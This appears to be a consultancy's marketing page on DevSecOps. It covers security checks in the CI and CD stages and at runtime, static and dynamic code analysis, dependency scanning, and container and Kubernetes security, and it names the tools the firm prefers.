Search:

DevSecOps

DevSecOps practices help to adapt shift-left mentality on the DevOps pipeline by applying several Security measures

CISec
  • Security measures applied during CI(Continuous Integration) phase means detecting the risks are earliest as possible during DevOps pipelines which usually consists of static code analysis and dependency security checks.
CDSec
  • CD(Continuous Delivery) security tests are run against deployed artefacts, preferably in a prod-like environment. Those tests may include dynamic-code analysis and penetration tests before releasing.

RuntimeSec
  • Runtime security consists of several controls including security vulnerability on runtime related to dependencies or anomalies on container platforms. Those are additional security checks apart from existing IDS/IPS/WAF protections.

Common DevSecOps Practices

Static Code Analysis (SAST)

Dynamic Code Analysis (DAST)

Library dependencies vulnerability checks

Docker Image vulnerabillty checks

Runtime container anomalies 

Runtime dependency security vulnerabilities

devsecops

Security-as-code

Defining all security checks and controls as code help a step forward to have a common base with development teams. 


Ultimate Shift-left:  Developer IDE

Considering security is included in the DoD(Definition of Done),

Secure-code Guideline

Code review

- Pair programming

should be in place to enable the most shift-left!


OWASP Dependency checks
 
Check the dependency CVE scores to take necessary actions for the security vulnerabilities.

DevSecOps Tools and Services


Dependency Checks

There are several tools and practices for dependency checks on your code. Based on the tool capabilities, security checks, and instant feedback can be provided to developers by using the plugins on Development IDEs. Here are the common tools that we support for dependency controls:    


We are suggesting those tools based on the evidence of their community and the wide support on the CI/CD pipeline.


SAST and DAST

Static Application Security Testing (SAST) consists of code-level security checks. Although there are several programming language-specific OpenSource free or commercial tools, Sonarqube seems to gain a wider acceptance from the developer community and is accepted by developer teams.

 

Dynamic Application Security Testing (DAST) is related to analyzing actual flows in the code runtime. Integrating such solutions on DevOps pipeline also means applying shift-left with tools such as Fortify WebInspect.

 

 


Container and Kubernetes Security

Containers and their orchestration platform Kubernetes should also be a part of several security measures, controls and checks.

"Shift-left" approach for Docker containers and Kubernetes is related to analyzing the security risks on Dockerfile level and Kubernetes cluster-wide and application-specific declarative definitions. At Kloia, we are benefiting from several OpenSource and commercial tools, as well as internal practices, to identify such risks. We also have a "Kubernetes Audit" Solution where we check the Kubernetes clusters in four dimensions, including the Security. We also refer to CIS Kubernetes Benchmarks as a reference guide. 

 

Regarding the runtime security, although we have tried out the alternatives, Prisma Cloud(formerly Twistlock) became the Kloian choice with its wider support, especially for runtime security. However, it has wider features including Public-Cloud and dependency checks which also means it's playing a wider role in that security domain. 
 

Get in touch